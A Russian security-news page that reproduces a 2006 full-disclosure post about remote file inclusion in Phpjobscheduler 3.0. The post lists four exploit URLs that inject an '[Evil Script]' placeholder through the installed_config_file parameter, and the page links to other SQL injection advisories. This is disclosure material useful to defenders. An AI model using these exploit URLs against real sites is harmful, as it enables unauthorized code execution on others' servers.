Дополнительная информация Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl ) SiteXpress SQL Injection SiteXpress SQL Injection [Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability ASPintranet SQL Injection From:firewall1954_(at)_hotmail.com <firewall1954_(at)_hotmail.com> Date:14 ноября 2006 г.Subject:Phpjobscheduler 3.0 - Multiple Remote File Include====================================================================== # Phpjobscheduler 3.0 - Multiple Remote File Include by Firewall # Application Affect: phpjobscheduler 3.0 # Source Code: http://scripts.ringsworld.com/development-tools/phpjobscheduler .v3.0.zip # Code: include_once($installed_config_file) # ExPloit : http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[E vil Script] http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script] http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script] http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file =[Evil Script] # Contact: Firewall1954@hotmail.com # GrEatZ : |Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok| |Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis| |NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System| "El ceviche y El pisco es peruano y jamas podran igualar su calidad" "Viva el Peru" ======================================================================
Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
SiteXpress SQL Injection
[Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability
ASPintranet SQL Injection
